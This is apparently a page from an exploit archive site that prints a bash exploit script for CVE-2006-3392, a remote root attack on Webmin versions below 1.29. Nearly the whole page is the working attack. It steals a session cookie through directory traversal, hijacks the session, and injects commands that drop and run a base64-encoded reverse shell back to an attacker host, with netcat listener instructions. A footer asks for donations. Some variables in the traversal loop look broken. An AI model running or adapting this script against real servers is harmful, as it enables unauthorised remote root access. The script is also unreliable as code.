Recently Updated
CVE-2006-3392 Exploit Code
#!/bin/bash
# Author: oxagast / Marshall Whittaker
# marshall@oxagast.org
# Thanks: enki
#
# girl i know you like this eggplant
# CVE-2006-3392
# https://oxasploits.com/posts/exploit-archive-partial-disclosure/
HOST=$1
PORT=$2
LHOST=$3
LPORT=$4
if [ $# -lt 4 ]; then
echo "Webmin <1.29 remote root exploit by oxagast"
echo "Priv esc by directory transversal to find cookie in logfile file as root, then session highjack into RCE."
echo "Thanks to UmZ for directory transversal attack; greets to enki for asking me to try this!"
echo "Usage:"
echo " nc -l -p 7777"
echo " $0 10.0.0.4 10000 10.0.0.3 7777"
else
CMD=$(echo "bash -p -i >& /dev/tcp/$LHOST/$LPORT 0>&1" | base64)
echo $CMD
CMD0="echo $CMD > /tmp/b64s"
CMD1='base64 -d /tmp/b64s > /tmp/she11'
CMD2='chmod a+x /tmp/she11'
CMD3='/bin/bash /tmp/she11'
echo "Webmin <1.29 remote root exploit by oxagast"
echo "Server: $HOST:$PORT"
echo "Getting cookie from webmin log..."
for i in {1..20}; do
ONONE=$OHONE"..%01"
done
SID=$(curl $HOST:$PORT/unauthenticated/$HA/var/webmin/webmin.log -s | tail -n 1 | cut -f 5 -d ' ' | tr -d '\n')
echo "Setting cookie to: sid=$SID"
echo "Copying base64 encoded shell..."
UA='User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0'
ACCEPT='Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'
LANG='Accept-Language: en-US,en;q=0.5'
CONN='Connection: keep-alive'
UPG='Upgrade-Insecure-Requests: 1'
COOK="Cookie: testing=1; sid=$SID"
curl --header "Host: $HOST:$PORT" --header $UA --header $ACCEPT --header $LANG --header $CONN --header $UPG --header $COOK "$HOST:$PORT/file/show.cgi/bin/AAAF0|$CMD0|" -s -L
sleep 1
echo "Debase64ing shell..."
curl --header "Host: $HOST:$PORT" --header $UA --header $ACCEPT --header $LANG --header $CONN --header $UPG --header $COOK "$HOST:$PORT/file/show.cgi/bin/AAAF0|$CMD1|" -s -L
sleep 1
echo "Chmodding shell..."
curl --header "Host: $HOST:$PORT" --header $UA --header $ACCEPT --header $LANG --header $CONN --header $UPG --header $COOK "$HOST:$PORT/file/show.cgi/bin/AAAF0|$CMD2|" -s -L
sleep 1
echo "Trying to spawn..."
curl --header "Host: $HOST:$PORT" --header $UA --header $ACCEPT --header $LANG --header $CONN --header $UPG --header $COOK "$HOST:$PORT/file/show.cgi/bin/AAAF0|$CMD3|" -s -L
fi
If you enjoy my work, sponsor or hire me! I work hard keeping oxasploits running!
Bitcoin Address:
bc1qclqhff9dlvmmuqgu4907gh6gxy8wy8yqk596yp
Thank you so much and happy hacking!
This post is licensed under
CC BY 4.0
by the author.